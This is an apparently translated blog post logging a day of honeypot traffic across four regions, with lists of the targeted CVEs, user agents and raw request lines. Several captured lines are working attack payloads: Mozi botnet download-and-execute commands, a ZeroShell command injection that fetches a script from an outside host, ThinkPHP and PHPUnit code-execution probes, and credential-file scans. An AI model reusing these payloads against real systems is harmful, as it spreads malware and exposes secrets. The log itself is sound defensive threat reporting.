コンニチハレバレトシタアオゾラ

With nothing better to do, I sit before my blog all day and jot down, aimlessly, the trifling thoughts that drift through my mind,

2022/06/02 Honeypot (tentative) observation log

Honeypot (tentative) observation log for 2022/06/02.

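Highlights
Common to all locations

Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Access targeting ThinkPHP vulnerabilities
Scanning for /.aws
Scanning for Apache Solr
Scanning for Laravel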

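Location:JP

Access targeting vulnerabilities in D-link products
Access targeting GPON router vulnerabilities
Scanning with curl
Scanning for .js
Scanning for /.env
Scanning for phpMyAdmin
Unauthorized traffic related to 110.242.68.4
Unauthorized traffic related to 45.85.218.132
Access with the UserAgent "Hello, World"

The above were observed.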

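Location:US

Access targeting vulnerabilities in D-link products
Access targeting the ZeroShell Linux distribution vulnerability (CVE-2009-0545)
Scanning with curl
Scanning for /.env
Scanning for WordPress plugins
Scanning for phpMyAdmin
Unauthorized traffic related to 45.85.218.132

The above were observed.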

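Location:UK

Access targeting vulnerabilities in D-link products
Access targeting GPON router vulnerabilities
Scanning with ZmEu
Scanning for /.git
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Unauthorized traffic related to 110.242.68.4
Unauthorized traffic related to 45.85.218.132
Unauthorized traffic related to 85.206.160.115
Access with the UserAgent "Hello, world"

The above were observed.

The following access to /shell was observed.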

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
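
Location:SG

Access targeting GPON router vulnerabilities
Access targeting vulnerabilities in NetGear products
Scanning with zgrab
Scanning for /.env
Scanning for WordPress
Unauthorized traffic related to 45.85.218.132
Unauthorized traffic related to 85.206.160.115

The above were observed.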

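Access count trend

JP: Total accesses: 128 (change from previous day: -237)
US: Total accesses: 242 (change from previous day: -193)
UK: Total accesses: 75 (change from previous day: -128)
SG: Total accesses: 123 (change from previous day: 42)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.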

Location:JP

Source IP address list


UserAgent list

Count UserAgent
14 -
1 Hello, World
8 Mozila/5.0
1 Mozilla/4.01707650 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; EmbeddedWB 14.52 from: http[:]//www[.]bsalsa[.]com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
1 Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https[:]//zhanzhang[.]toutiao[.]com/)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3239.132 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
40 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36
16 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.68.0

Request list

Count Method Request Protocol
3 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
3 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
4 CONNECT cn[.]bing[.]com:443 HTTP/1.1
4 CONNECT www[.]baidu[.]com:443 HTTP/1.1
4 CONNECT www[.]so[.]com:443 HTTP/1.1
4 CONNECT www[.]voanews[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
38 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /console/ HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//safe[.]govfz[.]com/warn/land?u=http%3A%2F%2Fdongtaiwang[.]com%00&c=100110177&a=103&uuid=hangzhou-jingfang-1171337435-2523046903&d=&e=1006 HTTP/1.1
3 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
4 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
4 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
4 GET http[:]//www[.]soso[.]com/ HTTP/1.1
3 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
4 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
7 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list


UserAgent list

Count UserAgent
30 -
1 Go-http-client/1.1
9 Mozila/5.0
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
119 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330
1 Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
3 \"Mozilla/5.0
1 curl/7.68.0

Request list

Count Method Request Protocol
3 \x03
2 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
7 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
24 GET /.env HTTP/1.1
1 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/pma/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
14 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5[.]206[.]227[.]228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /cli/.env HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /daili5/m.html?channelCode=daili5 HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /nmaplowercheck1654054853 HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
8 POST /editBlackAndWhiteList HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0

Location:UK

Source IP address list


UserAgent list

Count UserAgent
20 -
1 Go-http-client/1.1
1 Hello, world
1 Java/1.8.0_333
6 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 Gecko/20100101
1 Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
1 Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
8 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
6 ZmEu
1 python-requests/2.22.0

Request list

Count Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
2 \x16\x03\x03
2 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
2 CONNECT cn[.]bing[.]com:443 HTTP/1.1
1 CONNECT es[.]search[.]yahoo[.]com:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com:443 HTTP/1.1
2 CONNECT www[.]so[.]com:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
2 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
5 POST /editBlackAndWhiteList HTTP/1.1
2 POST /rpc HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0

Location:SG

Source IP address list


UserAgent list

Count UserAgent
22 -
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
28 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
2 -
3 \x03
3 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
3 GET /?s=/index/ hink
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /autodiscover/autodiscover.json/v1.0/1@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cli/.env HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
